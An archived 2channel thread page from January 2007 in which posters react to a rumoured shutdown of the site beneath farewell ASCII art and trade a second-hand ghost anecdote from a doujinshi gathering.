 人 ミ ,,,  ~,,,ノ  .n  THANK YOU 2ch ■■-っ ┌───────┐  \ ';:::┌===┐./   
( ゚ー゚)と..ミ,,,/~),ヽ(凸)ノ~     and..     ´∀`/. | ●        ● |     ヽ ヾ二ソ./  
  / ̄ ̄し'J\[Y] GOOD-BYE 2ch WORLD! /| .┌▽▽▽▽┐. |____|__||_| )):`---´:ト _
 /     ●  ●、ヽ                  (. ┤ .|        |. |□━□ ) (゚Д゚)? \/
 |Y  Y       \  またどこかで会おうね.. \.  └△△△△┘. |  J  |)∧_∧ (<::V::>)ノシ
 |.|   |       .▼ |∀゚)               |\あ\       | ∀ ノ " ,  、 ミ 〔o〕
 | \ /■\  _人 |∧∧∩゛∧_∧∩゛∧_∧  |   \り.\     | - Å′ ゝ∀ く (0H0)ノシ
 |  ( ´∀`)___/( ゚Д゚.)'/ ( ´∀` )/ (・∀・ ),. |.    \が\.    |  ). \  Λ_Λ /Hヽ
 \ ( O   )  冫、 U  /  (     / ⊂  ⊂.)ヽ(´ー`)ノ゛ \と.. ∧_∧/(´Д`;)<丶`∀´>(0M0)ノシ
  |││ │   `   |   |   ∪ |  |  ( ( (  (  へ (゚д゚)〜⌒(゚ー゚*) (-_-) (・ω・` )  人
  (_(__(__)(・∀・) ∪~∪  (_(__) (_(_) く ⊂⌒~⊃。Д。)⊃⊃⊃(∩∩)(∩ ∩) (0w0)ノシ


77 :花と名無しさん:2007/01/23(火) 09:57:28 ID:???O
おそすぎ

78 :花と名無しさん:2007/01/23(火) 10:16:20 ID:???0
ここに貼る意味があるのかw

79 :花と名無しさん:2007/01/23(火) 13:42:17 ID:???0
今日の20時に2ちゃんねる閉鎖だってさ

80 :花と名無しさん:2007/01/23(火) 13:43:41 ID:???0
閉鎖されたらどこ行く?教えて!憑いていくから!

81 :花と名無しさん:2007/01/23(火) 13:54:39 ID:???0
ガセだよ

82 :花と名無しさん:2007/01/23(火) 14:50:15 ID:???0
昔々、翼以前J9の頃に友人が同人の修羅場合宿かなんかで一緒したことがあるらしい。
集まった人間が怪談好きで霊感持ちも居たそうで、そんな話してると窓の外に集まって
きたらしい。
なんかヤバい雰囲気になってきたところ、霊はエロが苦手らしい、と言うことで、彼女が
ハードな絡み絵をサラサラと描いて窓に押しつけたら嫌な気配が四散したらしい。

ちなみにその頃の彼女の絵柄はとある同人作家さんとそっくりだった。
その人と合作した話は区別つかなかった。
伝聞かつ古すぎるネタでゴメンね。

83 :花と名無しさん:2007/01/23(火) 23:33:05 ID:???0
>>82
バケツアゴでキラキラ瞳の絵の頃?
山羊さわリオっぽいなーとか思ってたが
関係なかったらごめん

84 :花と名無しさん:2007/01/24(水) 00:50:10 ID:???O
バケツアゴってどんなのよwww

85 :花と名無しさん:2007/01/24(水) 10:16:24 ID:???0
2ちゃんねる閉鎖しなくてよかったね!

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)